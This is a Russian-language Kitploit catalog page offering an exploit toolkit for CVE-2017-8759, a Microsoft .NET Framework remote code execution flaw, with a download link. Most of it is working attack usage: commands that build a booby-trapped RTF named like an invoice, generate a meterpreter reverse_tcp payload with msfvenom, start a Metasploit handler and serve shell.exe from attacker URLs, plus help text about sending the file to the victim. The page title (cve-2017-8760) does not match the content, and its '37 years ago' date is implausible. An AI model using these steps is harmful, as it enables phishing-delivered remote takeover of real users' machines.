Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2017-8760 | Kitploit
Инструменты/GitHubGitHub/voraka/cve-2017-8760
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubvoraka/cve-2017-8760

cve-2017-8760

Репозиторий
37 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Exploit toolkit CVE-2017-8759 - v1.0

Exploit toolkit CVE-2017-8759 - v1.0 — это удобный скрипт на Python, который предоставляет пентестерам и исследователям безопасности быстрый и эффективный способ тестирования RCE в Microsoft .NET Framework. Он позволяет создать вредоносный RTF-файл и доставить полезную нагрузку metasploit / meterpreter / другую жертве без сложной настройки.

Отказ от ответственности

Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Обычный отказ от ответственности применяется, особенно тот факт, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержимое или неправомерное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т. д.), вызванный использованием этих программ, не является ответственностью bhdresh.

Наконец, это личная разработка, уважайте её философию и не используйте во вред!

Лицензия

Лицензия CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Примечание к выпуску:

Добавлены следующие возможности в скрипт:

root@kitploit:~
- Создание вредоносного RTF-файла
- Режим эксплуатации для созданного RTF-файла

Версия: Python 2.7.13

Сценарий: Доставка локальной полезной нагрузки meterpreter

Видеоурок: https://www.youtube.com/watch?v=46jEa1bmORM
Примеры команд
root@kitploit:~
1) Создание вредоносного RTF-файла
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Необязательно, если используется полезная нагрузка MSF) : Создание полезной нагрузки metasploit и запуск обработчика
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запуск набора инструментов в режиме эксплуатации для доставки локальной полезной нагрузки
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Аргументы командной строки:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Это удобный набор инструментов для эксплуатации CVE-2017-8759 (Microsoft .NET Framework RCE)

Режимы:

-M gen                                          Только создание вредоносного файла

     Создание вредоносного RTF-файла:

      -w <Filename.rtf>                   Имя вредоносного RTF-файла (поделитесь этим файлом с жертвой).

      -u <http://attacker.com/test.txt>   Путь к удалённому txt-файлу. Обычно это должен быть домен или IP-адрес, где запущен этот инструмент.
                                          Например, http://attackerip.com/test.txt (этот URL будет включён во вредоносный RTF-файл, и он будет запрошен, как только жертва откроет вредоносный RTF-файл.

				      
-M exp                                          Запуск режима эксплуатации

     Эксплуатация:
  
      -p <TCP port:Default 80>            Локальный номер порта.

      -e <http://attacker.com/shell.exe>  Путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке, которые должны быть выполнены на цели.

      -l </tmp/shell.exe>                 Укажите локальный путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке.

Автор

@bhdresh

Благодарности

@Voulnet, @vysec, @bhdresh

Ошибки, проблемы, запросы функций

Очевидно, я не профессиональный разработчик, поэтому возможны некоторые сбои.

Пожалуйста, сообщайте об ошибках и проблемах через https://github.com/bhdresh/CVE-2017-8759/issues/new

Скачать инструмент